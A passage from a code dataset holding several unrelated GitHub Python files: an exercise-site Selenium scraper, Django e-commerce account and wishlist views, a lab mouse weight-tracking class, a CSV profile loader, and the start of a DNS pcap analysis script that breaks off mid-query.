"call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 214, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 221, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 222, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 251, "usage_type": "call"}]} +{"seq_id": "37572488534", "text": "#Exercises\r\n #Type\r\n #Muscles\r\n #Equipment\r\n #Level (varchar)\r\n #images (varchar)\r\n #Review/Rating (varchar)\r\n #Instructions (varchar)\r\n #Image1\r\n #Image2\r\n#plan\r\n #Go through all muscle groups\r\n #Click each exercise\r\n\r\n\r\ndef scrape(muscleID):\r\n\r\n from selenium import webdriver\r\n\r\n baseUrl = \"https://www.bodybuilding.com/exercises/finder/?muscleid=\"\r\n # change to your browser and location of your driver\r\n driver = webdriver.Chrome(executable_path=\"/Users/Nickp/Desktop/chromedriver.exe\")\r\n driver.set_page_load_timeout(5)\r\n\r\n try:\r\n driver.get(baseUrl + str(muscleID))\r\n except:#timeout\r\n pass\r\n\r\n \"\"\"\r\n muscleGroups = driver.find_element_by_xpath(\"//section[@class='ExCategory-formSection']\").find_element_by_css_selector('ul').find_elements_by_css_selector('li')\r\n for muscle in muscleGroups:\r\n muscle.find_element_by_css_selector('label').click()\r\n \"\"\"\r\n\r\n for i in range(0, 1):\r\n try:\r\n nextButton = 
driver.find_element_by_css_selector(\".bb-flat-btn.bb-flat-btn--size-lg.bb-spinner-btn.js-ex-loadMore.ExLoadMore-btn\").click()\r\n except:\r\n break\r\n exercises = driver.find_elements_by_xpath(\"//h3[@class='ExHeading ExResult-resultsHeading']\")\r\n exerciseUrls = [\"\" for exercise in range(len(exercises))]\r\n for i in range(len(exercises)):\r\n exerciseUrls[i] = exercises[i].find_element_by_css_selector('a').get_attribute('href')\r\n\r\n exerciseName = [\"\" for url in range(len(exerciseUrls))]\r\n types = [\"\" for url in range(len(exerciseUrls))]\r\n muscleWorked = [\"\" for url in range(len(exerciseUrls))]\r\n equipment = [\"\" for url in range(len(exerciseUrls))]\r\n level = [\"\" for url in range(len(exerciseUrls))]\r\n instructions = [\"\" for url in range(len(exerciseUrls))]\r\n rating = [\"\" for url in range(len(exerciseUrls))]\r\n imageOne = [\"\" for url in range(len(exerciseUrls))]\r\n imageTwo = [\"\" for url in range(len(exerciseUrls))]\r\n\r\n for i in range(len(exerciseUrls)):\r\n try:\r\n driver.get(exerciseUrls[i])\r\n exerciseName[i] = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[1]/div[1]/h2\").get_attribute(\"innerHTML\")\r\n exerciseName[i] = exerciseName[i].strip()\r\n types[i] = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[2]/div[2]/ul/li[1]/a\").get_attribute(\"innerHTML\")\r\n types[i] = types[i].strip()\r\n muscleWorked[i] = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[2]/div[2]/ul/li[2]/a\").get_attribute(\"innerHTML\")\r\n muscleWorked[i] = muscleWorked[i].strip()\r\n equipment[i] = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[2]/div[2]/ul/li[3]/a\").get_attribute(\"innerHTML\")\r\n equipment[i] = equipment[i].strip()\r\n level[i] = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[2]/div[2]/ul/li[4]\").get_attribute(\"innerHTML\")\r\n level[i] = level[i].replace('Level:', \"\") #formatting\r\n level[i] = level[i].strip()\r\n rating[i] = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[2]/div[3]/div/div[1]\").get_attribute(\"innerHTML\")\r\n rating[i] = rating[i].strip()\r\n imageOne[i] = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[3]/div[1]/div[1]/img\").get_attribute(\"src\")\r\n imageTwo[i] = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[3]/div[1]/div[2]/img\").get_attribute(\"src\")\r\n instructionList = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[4]/div/div[2]/ol\")\r\n instructionList = instructionList.find_elements_by_tag_name(\"li\")\r\n x = 1 ##instruction number\r\n for j in range(len(instructionList)):\r\n instructions[i] += \" \" + str(x) + \". 
\" + instructionList[j].text\r\n x += 1\r\n\r\n \"\"\" ##might not want to include\r\n if(driver.find_elements_by_xpath(\"//*[contains(text(),'Caution:')]\").__sizeof__() > 0):\r\n caution[i] = driver.find_element_by_xpath(\"//*[contains(text(),'Caution:')]\").find_element_by_xpath(\"..\").get_attribute(\"innerHTML\")\r\n caution[i] = caution[i].replace(\"<strong>Caution:</strong> \", \"\") #formating\r\n \r\n if(driver.find_elements_by_xpath(\"//*[contains(text(),'Variations:')]\").__sizeof__() > 0):\r\n variations[i] = driver.find_element_by_xpath(\"//*[contains(text(),'Variations:')]\").find_element_by_xpath(\"..\").get_attribute(\"innerHTML\")\r\n variations[i] = variations[i].replace(\"<strong>Variations:</strong>\" , \"\") #formating\r\n \"\"\"\r\n\r\n except:#timeout\r\n pass\r\n\r\n\r\n\r\n sqlFile = open(\"file.txt\", \"a+\")\r\n for i in range(len(exerciseUrls)):\r\n sqlFile.write(exerciseName[i] + \"\\t\")\r\n sqlFile.write(muscleWorked[i] + \"\\t\")\r\n sqlFile.write(equipment[i] + \"\\t\")\r\n sqlFile.write(level[i] + \"\\t\")\r\n sqlFile.write(rating[i] + \"\\t\")\r\n sqlFile.write(instructions[i] + \"\\t\")\r\n sqlFile.write(imageOne[i] + \"\\t\")\r\n sqlFile.write(imageTwo[i] + \"\\n\")\r\n\r\n sqlFile.close()\r\n\r\n driver.quit();\r\n", "repo_name": "swole-goals/SwoleGoals", "sub_path": "scraping/scraping.py", "file_name": "scraping.py", "file_ext": "py", "file_size_in_byte": 5270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 22, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "74744849883", "text": "from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.generic import View\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.hashers import make_password,check_password\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.urls import reverse_lazy\nfrom django.contrib import messages\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom account.tasks import send_confirmation_mail\nfrom django.utils.encoding import force_str\nfrom django.utils.http import urlsafe_base64_decode\nfrom django.utils.translation import gettext_lazy as _\nfrom .tokens import account_activation_token\nfrom .forms import RegisterForm, ProfileForm\nfrom product.models import Variant, Image\nfrom .models import User, WishList\nfrom payment.models import Cart\n\n# Create your views here.\n\n# def forget_pwd(request):\n# email = request.GET.get('email', \"\")\n# user = User.objects.filter(email=email).first()\n# if user:\n# send_confirmation_mail(user=user, current_site=get_current_site(request))\n\n# return render(request, 'forget_pwd.html')\n\n\ndef sign_in(request):\n if request.user.is_authenticated:\n return redirect(reverse_lazy('account:profile'))\n else:\n error = ''\n if request.method == \"POST\":\n if '@' in request.POST['emailorusername']:\n email = request.POST['emailorusername']\n if User.objects.filter(email=email):\n username = User.objects.get(email=email).username\n else: username=None\n else:\n username = request.POST['emailorusername']\n if User.objects.filter(username=username):\n username = request.POST['emailorusername']\n else: username=None\n password = request.POST['password']\n user = authenticate(request, username 
= username, password = password)\n if user is not None: \n login(request,user)\n messages.add_message(request, messages.SUCCESS, f\"{('Welcome')} {str(username).upper()}!\")\n return redirect(reverse_lazy(\"core:home\"))\n else: error=('Email or username or password wrong')\n \n return render(request,'login.html', context={'error':error})\n\n\n@login_required()\ndef profile(request):\n if request.method == 'POST':\n\n form = ProfileForm(request.POST)\n if form.is_valid():\n profile = form.save(commit=False)\n profile.country = request.POST.get('selected_country')\n profile.save()\n return redirect(reverse_lazy(\"core:home\"))\n else:\n form = ProfileForm()\n\n \n context = {\n 'form': form\n }\n\n return render(request, 'profile.html', context)\n\n\ndef sign_up(request):\n if request.user.is_authenticated:\n return redirect(reverse_lazy('account:profile'))\n else:\n form = RegisterForm()\n if request.method == \"POST\":\n form = RegisterForm(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n user.set_password(form.cleaned_data['password'])\n user.is_active = False\n user.save()\n\n cart = Cart.objects.create(user=user)\n send_confirmation_mail(user=user, current_site=get_current_site(request))\n # current_site = get_current_site(request)\n # send_activate_link(user,current_site.domain,urlsafe_base64_encode(force_bytes(user.pk)), account_activation_token.make_token(user),)\n messages.add_message(request, messages.SUCCESS, f\"Activation mail sended!\") \n return redirect(reverse_lazy('account:login'))\n return render(request,'register.html', context={'form':form})\n\n\nclass ActiveAccountView(View):\n def get(request, *args, **kwargs):\n uidb64 = kwargs['uidb64']\n token = kwargs['token']\n try:\n uid = force_str(urlsafe_base64_decode(uidb64))\n user = User.objects.get(pk=uid)\n except (TypeError, ValueError, OverflowError, User.DoesNotExist):\n user = None\n\n if user is not None and account_activation_token.check_token(user, token):\n user.is_active = True\n user.save()\n return redirect(reverse_lazy(\"account:login\"))\n else:\n return render(request, 'activation.html')\n\n\ndef vendor_profile(request):\n return render(request, 'vendor-profile.html')\n \n\ndef wishlist(request):\n if request.user.is_authenticated:\n wishlist = WishList.objects.filter(user=request.user)\n \n if wishlist:\n images = []\n for wish in wishlist:\n images.append(Image.objects.filter(variant = wish.variant).filter(is_main=True).first())\n else:\n images = []\n else:\n if request.session.get(\"wishlist\"):\n variants_ids = request.session[\"wishlist\"].split()\n images = Image.objects.filter(variant__id__in=(variants_ids)).filter(is_main=True)\n else:\n images = []\n \n context = {\n 'images': images\n }\n\n return render(request, 'wishlist.html', context)\n\n\ndef remove_item(request, variant_id):\n if request.user.is_authenticated:\n item = get_object_or_404(WishList, user=request.user, variant__id=variant_id)\n item.delete()\n else:\n if request.session.get(\"wishlist\"):\n variants_ids = request.session[\"wishlist\"].split()\n if str(variant_id) in variants_ids:\n variants_ids.remove(str(variant_id))\n request.session[\"wishlist\"] = \" \".join(variants_ids)\n request.session.modified = True\n\n messages.success(request, \"The Product has been Removed from the Wishlist!\")\n\n return redirect('account:wishlist')\n\n\ndef add_item(request, variant_id):\n if request.user.is_authenticated:\n variant = Variant.objects.filter(id=variant_id).first()\n wishlist = 
WishList.objects.filter(user=request.user)\n variants = []\n\n for wish in wishlist:\n variants.append(wish.variant)\n\n if variant in variants:\n return redirect('core:error')\n else:\n WishList.objects.create(user=request.user, variant=variant)\n \n else:\n existing_variant = request.session.get(\"wishlist\", \"\")\n existing_variant = existing_variant + ' ' + str(variant_id)\n request.session[\"wishlist\"] = existing_variant.strip()\n\n messages.success(request, _(\"The Product has been Added to the Wishlist!\"))\n\n return redirect('account:wishlist')\n\n\ndef logout_request(request):\n logout(request)\n return redirect('account:login')\n\n\n", "repo_name": "rustamzada0/Django-Web-Project-E-Commerce---Multikart-", "sub_path": "account/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6894, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.shortcuts.redirect", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.reverse_lazy", "line_number": 34, "usage_type": "call"}, {"api_name": "models.User.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 40, "usage_type": "name"}, {"api_name": "models.User.objects.get", "line_number": 41, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 41, "usage_type": "name"}, {"api_name": "models.User.objects.filter", "line_number": 45, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 45, "usage_type": "name"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 49, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 51, "usage_type": "call"}, {"api_name": "django.contrib.messages.add_message", "line_number": 52, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 52, "usage_type": "name"}, {"api_name": "django.contrib.messages.SUCCESS", "line_number": 52, "usage_type": "attribute"}, {"api_name": "django.shortcuts.redirect", "line_number": 53, "usage_type": "call"}, {"api_name": "django.urls.reverse_lazy", "line_number": 53, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 56, "usage_type": "call"}, {"api_name": "forms.ProfileForm", "line_number": 63, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 68, "usage_type": "call"}, {"api_name": "django.urls.reverse_lazy", "line_number": 68, "usage_type": "call"}, {"api_name": "forms.ProfileForm", "line_number": 70, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 77, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 82, "usage_type": "call"}, {"api_name": "django.urls.reverse_lazy", "line_number": 82, "usage_type": "call"}, {"api_name": "forms.RegisterForm", "line_number": 84, "usage_type": "call"}, {"api_name": "forms.RegisterForm", "line_number": 86, "usage_type": "call"}, {"api_name": "payment.models.Cart.objects.create", "line_number": 93, "usage_type": "call"}, {"api_name": "payment.models.Cart.objects", "line_number": 93, "usage_type": "attribute"}, {"api_name": 
"payment.models.Cart", "line_number": 93, "usage_type": "name"}, {"api_name": "account.tasks.send_confirmation_mail", "line_number": 94, "usage_type": "call"}, {"api_name": "django.contrib.sites.shortcuts.get_current_site", "line_number": 94, "usage_type": "call"}, {"api_name": "django.contrib.messages.add_message", "line_number": 97, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 97, "usage_type": "name"}, {"api_name": "django.contrib.messages.SUCCESS", "line_number": 97, "usage_type": "attribute"}, {"api_name": "django.shortcuts.redirect", "line_number": 98, "usage_type": "call"}, {"api_name": "django.urls.reverse_lazy", "line_number": 98, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 99, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 102, "usage_type": "name"}, {"api_name": "django.utils.encoding.force_str", "line_number": 107, "usage_type": "call"}, {"api_name": "django.utils.http.urlsafe_base64_decode", "line_number": 107, "usage_type": "call"}, {"api_name": "models.User.objects.get", "line_number": 108, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 108, "usage_type": "name"}, {"api_name": "models.User.DoesNotExist", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 109, "usage_type": "name"}, {"api_name": "tokens.account_activation_token.check_token", "line_number": 112, "usage_type": "call"}, {"api_name": "tokens.account_activation_token", "line_number": 112, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 115, "usage_type": "call"}, {"api_name": "django.urls.reverse_lazy", "line_number": 115, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 117, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 121, "usage_type": "call"}, {"api_name": "models.WishList.objects.filter", "line_number": 126, "usage_type": "call"}, {"api_name": "models.WishList.objects", "line_number": 126, "usage_type": "attribute"}, {"api_name": "models.WishList", "line_number": 126, "usage_type": "name"}, {"api_name": "product.models.Image.objects.filter", "line_number": 131, "usage_type": "call"}, {"api_name": "product.models.Image.objects", "line_number": 131, "usage_type": "attribute"}, {"api_name": "product.models.Image", "line_number": 131, "usage_type": "name"}, {"api_name": "product.models.Image.objects.filter", "line_number": 137, "usage_type": "call"}, {"api_name": "product.models.Image.objects", "line_number": 137, "usage_type": "attribute"}, {"api_name": "product.models.Image", "line_number": 137, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 145, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 150, "usage_type": "call"}, {"api_name": "models.WishList", "line_number": 150, "usage_type": "argument"}, {"api_name": "django.contrib.messages.success", "line_number": 160, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 160, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 162, "usage_type": "call"}, {"api_name": "product.models.Variant.objects.filter", "line_number": 167, "usage_type": "call"}, {"api_name": "product.models.Variant.objects", "line_number": 167, "usage_type": "attribute"}, {"api_name": "product.models.Variant", "line_number": 167, 
"usage_type": "name"}, {"api_name": "models.WishList.objects.filter", "line_number": 168, "usage_type": "call"}, {"api_name": "models.WishList.objects", "line_number": 168, "usage_type": "attribute"}, {"api_name": "models.WishList", "line_number": 168, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 175, "usage_type": "call"}, {"api_name": "models.WishList.objects.create", "line_number": 177, "usage_type": "call"}, {"api_name": "models.WishList.objects", "line_number": 177, "usage_type": "attribute"}, {"api_name": "models.WishList", "line_number": 177, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 184, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 184, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 184, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 186, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 190, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 191, "usage_type": "call"}]} +{"seq_id": "2633297153", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom toolbox.mouse_In_excel import DataProcessor\nimport pickle\n\nclass Mouse:\n def __init__(self, name=None, cage_number=None, weight_list=None, date_list=None, weight_date_df=None, delta_weight=None, input_time=None, kill_time=None, kill_df=None, mouse_description=None, exception_description=None, location=None,\n input_food=None, release_food=None, mouse_kill=None):\n \"\"\"\n 初始化 Mouse 类的实例。\n\n Parameters:\n name (str): 鼠的名称。\n cage_number (int): 笼子编号。\n weight_list (list, np.ndarray, pd.Series): 包含鼠体重数据的列表、数组或 Series。\n date_list (list, pd.Series): 包含日期数据的列表或日期列。\n weight_date_df (pd.DataFrame): 包含体重和日期数据的 DataFrame。\n delta_weight (list, np.ndarray, pd.Series): 包含体重变化率的列表、数组或 Series。\n input_time (str): 鼠的录入时间。\n kill_time (str): 鼠的结束时间。\n kill_df (pd.DataFrame): 包含结束数据的 DataFrame。\n mouse_description (str): 关于鼠的描述。\n exception_description (str): 异常情况描述。\n location (str): 描述鼠所在的文件的位置\n input_food (dict): 包含进食数据的字典。\n release_food (dict): 包含剩余粮食数据的字典。\n mouse_kill (dict): 包含杀鼠表数据的字典。\n \"\"\"\n self.name = name\n self.cage_number = cage_number\n self.location = location\n self.input_food = input_food\n self.release_food = release_food\n self.kill = mouse_kill\n\n # 初始化 weight_list\n if weight_list is not None:\n if isinstance(weight_list, (list, np.ndarray)):\n self.weight_list = weight_list\n elif isinstance(weight_list, pd.Series):\n self.weight_list = weight_list\n else:\n raise ValueError(\"weight_list should be a list, NumPy array, or a DataFrame column.\")\n else:\n self.weight_list = None\n\n # 初始化 date_list\n if date_list is not None:\n if isinstance(date_list, list):\n self.date_list = pd.to_datetime(date_list, errors='coerce')\n elif isinstance(date_list, pd.Series):\n self.date_list = pd.to_datetime(date_list, errors='coerce')\n else:\n raise ValueError(\"date_list should be a list or a DataFrame column.\")\n else:\n self.date_list = None\n\n # 初始化 weight_date_df,进食变化\n if weight_date_df is None:\n self.weight_date_df = self.weight2data()\n else:\n self.weight_date_df = weight_date_df\n\n self.delta_weight = delta_weight\n\n # 快速的判断和转化日期时间\n self.input_time = pd.to_datetime(input_time, errors='coerce') if input_time is not None else None\n self.kill_time = pd.to_datetime(kill_time, errors='coerce') if kill_time is not None else None\n\n 
self.kill_df = kill_df\n        self.mouse_description = mouse_description\n        self.exception_description = exception_description\n\n    def weight2data(self):\n        \"\"\"\n        Create a DataFrame containing the weight and date data.\n\n        Returns:\n        pd.DataFrame: DataFrame containing weight and date data.\n        \"\"\"\n        if self.date_list is not None and self.weight_list is not None:\n            data_dict = {\n                \"date\": self.date_list,\n                self.name: self.weight_list\n            }\n            data_df = pd.DataFrame(data_dict)\n            return data_df\n        else:\n            raise ValueError(\"Both date_list and weight_list must be provided to create the DataFrame.\")\n\n    def plot_data(self, x, y, title, x_label, y_label, color):\n        \"\"\"\n        Plot how the data changes over time.\n\n        Parameters:\n        x (list, np.ndarray, pd.Series): X-axis data.\n        y (list, np.ndarray, pd.Series): Y-axis data.\n        title (str): Title of the plot.\n        x_label (str): X-axis label.\n        y_label (str): Y-axis label.\n        color (str): Color of the curve.\n        \"\"\"\n        plt.figure(figsize=(10, 6))\n        plt.plot(x, y, marker='o', linestyle='-', color=color)\n        plt.xlabel(x_label)\n        plt.ylabel(y_label)\n        plt.title(title)\n        plt.grid(True)\n        plt.show()\n\n    def plot_weight(self):\n        # Plot the weight over time\n        self.plot_data(self.weight_list.keys(), self.weight_list, f'{self.name}的体重变化', '日期', '体重', 'b')\n\n    def plot_delta_weight(self):\n        # Plot the weight change rate over time\n        self.plot_data(self.delta_weight.keys(), self.delta_weight, f'{self.name}的体重变化率', '日期', '体重变化率', 'g')\n\n    def plot_eat_food(self):\n        # Plot the weekly food intake over time\n        self.plot_data(self.weight_date_df.keys(), self.weight_date_df, f'{self.name}的进食变化', '日期', '每周的进食变化', 'g')\n\n    def change_data(self, decide, chose, new_value, date):\n        \"\"\"\n        Change the mouse's data according to the chosen parameters.\n\n        Parameters:\n        decide (str): Whether to add or delete data.\n        chose (str): Whether to change the weight record (\"体重记录\"), the sacrifice table (\"杀鼠表\"), the added food (\"新增粮食\") or the leftover food (\"剩余粮食\").\n        new_value: The new data value.\n        date: The date of the data.\n        \"\"\"\n        mouse_location = self.location\n        if chose == \"体重记录\":\n            sheet_name = \"体重记录\"\n            print(self.weight_list)\n        elif chose == \"杀鼠表\":\n            sheet_name = \"杀鼠表\"\n        elif chose == \"新增粮食\":\n            sheet_name = \"新增粮食\"\n            print(self.input_food)\n        elif chose == \"剩余粮食\":\n            sheet_name = \"剩余粮食\"\n            # self.release_food = np.nan\n            print(self.release_food)\n            # self.release_food\n\n    def addge_mouse(self, chose, date, value):\n        \"\"\"\n        Add or change the mouse's data.\n\n        Parameters:\n        chose (str): Whether to change the weight record, sacrifice table, added food or leftover food.\n        date: The date of the data.\n        value: The new data value.\n        \"\"\"\n        # Handles both adding new data and rewriting old data\n        if chose == \"体重记录\":\n            self.weight_list[date] = value\n            # print(self.weight_list)\n        elif chose == \"杀鼠表\":\n            sheet_name = \"杀鼠表\"\n            self.kill[date] = value\n        elif chose == \"新增粮食\":\n            sheet_name = \"新增粮食\"\n            self.input_food[date] = value\n            # print(self.input_food)\n        elif chose == \"剩余粮食\":\n            sheet_name = \"剩余粮食\"\n            # self.release_food = np.nan\n            # print(self.release_food)\n            self.release_food = value\n\n    def remove_mouse(self, chose, date):\n        \"\"\"\n        Delete the record with the given date from the mouse's data.\n\n        Parameters:\n        chose (str): Whether to delete a record from the weight record, sacrifice table, added food or leftover food.\n        date: The date of the data.\n        \"\"\"\n        if chose == \"体重记录\":\n            if date in self.weight_list:\n                del self.weight_list[date]\n        elif chose == \"杀鼠表\":\n            if date in self.kill:\n                del self.kill[date]\n        elif chose == \"新增粮食\":\n            if date in self.input_food:\n                del self.input_food[date]\n        elif chose == \"剩余粮食\":\n            if date in self.release_food:\n                del self.release_food[date]\n\n    def save_mouse(self, file_path=\"test_mouse.pkl\"):\n        \"\"\"\n        Save the mouse's data to a local file.\n\n        Parameters:\n        file_path (str): Path of the file in which to save the mouse data.\n        \"\"\"\n        with open(file_path, \"wb\") as file:\n            pickle.dump(self, file)\n\n\n
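# Usage sketch (illustrative only; 'test_mouse.pkl' mirrors save_mouse's default path):\n#   mouse = make_mouse()\n#   mouse.save_mouse('test_mouse.pkl')\n#   with open('test_mouse.pkl', 'rb') as f:\n#       mouse_again = pickle.load(f)\n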
def make_mouse(input_data=\"mouse-data\\\\test-data\", output_file=\"out-test\", mouse_number=\"mouse_109\", mouse_cage=\"cage_29\"):\n    \"\"\"\n    Create a Mouse object and initialize its attributes.\n\n    Parameters:\n    input_data (str): Input data file path.\n    output_file (str): Output file path.\n    mouse_number (str): ID of the mouse.\n    mouse_cage (str): Cage number.\n\n    Returns:\n    Mouse: The initialized Mouse object.\n    \"\"\"\n    data_processor = DataProcessor(input_data + '.xlsx', output_file + '.xlsx')\n    mouse_108 = data_processor.make_excel_mouse(mouse_number=mouse_number, mouse_food=\"MCD1\", mouse_cage=mouse_cage)\n\n    test_mouse = Mouse(\n        name=mouse_108['name'],\n        weight_date_df=mouse_108[f\"{mouse_cage}的每周进食量\"],\n        weight_list=mouse_108[f\"{mouse_number}的体重\"],\n        delta_weight=mouse_108[f\"{mouse_number}的体重变化\"],\n        mouse_description=mouse_108[f\"{mouse_number}的描述\"],\n        date_list=list(mouse_108[f\"{mouse_number}的体重\"].keys()),\n        location=mouse_108[\"location\"],\n        input_food=mouse_108[f\"{mouse_cage}的新增粮食\"],\n        release_food=mouse_108[f\"{mouse_cage}的剩余粮食\"],\n        mouse_kill=mouse_108[\"杀鼠表\"]\n    )\n\n    return test_mouse\n", "repo_name": "a-green-hand-jack/mouse", "sub_path": "toolbox/Mouse.py", "file_name": "Mouse.py", "file_ext": "py", "file_size_in_byte": 9425, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "numpy.ndarray", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 51, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 53, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 69, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 204, "usage_type": "call"}, {"api_name": "toolbox.mouse_In_excel.DataProcessor", "line_number": 220, "usage_type": "call"}]} +{"seq_id": "15591621759", "text": "import csv\nfrom pathlib import Path\n\n\nDATA_PATH = Path(__file__).parent.parent / 'data'\nPROFILE_DATA_PATH = DATA_PATH / 'profile_data.csv'\n\n\nwith open(PROFILE_DATA_PATH) as f:\n    reader = csv.DictReader(f)\n    all_profiles_raw = [dict(x) for x in reader]\n\n\ndef flat_profile(raw_profile):\n    d = raw_profile.copy()\n    d['favourite_shop'] = raw_profile['shop_1']\n    del d['shop_1'], d['shop_2']\n    return d\n\n\n
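# For instance (invented row, for illustration only):\n#   flat_profile({'name': 'Ada', 'shop_1': 'A', 'shop_2': 'B'})\n#   -> {'name': 'Ada', 'favourite_shop': 'A'}\n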
"exercises/tuples/example_data.py", "file_name": "example_data.py", "file_ext": "py", "file_size_in_byte": 471, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "88", "api": [{"api_name": "pathlib.Path", "line_number": 5, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "9950228854", "text": "from re import DEBUG\nfrom numpy.lib.arraysetops import unique\nimport psycopg2\nfrom psycopg2.extras import execute_values\nimport pandas as pd\nimport numpy as np\nimport time\nimport pprint\n\npp = pprint.PrettyPrinter(indent=4)\n\n# With LLR2 we intend to set-to-0 (zeroing) the NOSFX values between two thresholds.\n#\n#\n#\n#\n#\n#\n#\n#\n\n\ndb = psycopg2.connect(\"host=localhost dbname=dns user=postgres password=postgres\")\n\n\ndef f_llr(s_nosfx):\n num = s_nosfx.replace(\n [0, 1], [0.000_000_000_000_000_1, 1 - 0.000_000_000_000_000_1]\n )\n den = np.ones(len(num)) - num\n llr = np.log(num / den)\n return llr\n\n\ndf_pcap = pd.read_sql(\n 'SELECT id, \"name\", \"malware_id\", \"infected\", \"qr\", q, r, \"unique\", days FROM pcap ORDER BY name',\n db,\n)\n\nwindows = [\n 2500,\n 500,\n 100,\n]\n\nmax_q = np.lcm.reduce(windows) * (1_000_000 // np.lcm.reduce(windows))\n\nquery = \"\"\"\nDROP TABLE IF EXISTS public.window_qr_4;\n\nCREATE TABLE IF NOT EXISTS public.window_qr_4\n(\n id integer NOT NULL GENERATED ALWAYS AS IDENTITY ( INCREMENT 1 START 1 MINVALUE 1 MAXVALUE 2147483647 CACHE 1 ),\n pcap_id integer NOT NULL,\n size integer NOT NULL,\n \"window\" integer NOT NULL,\n\n 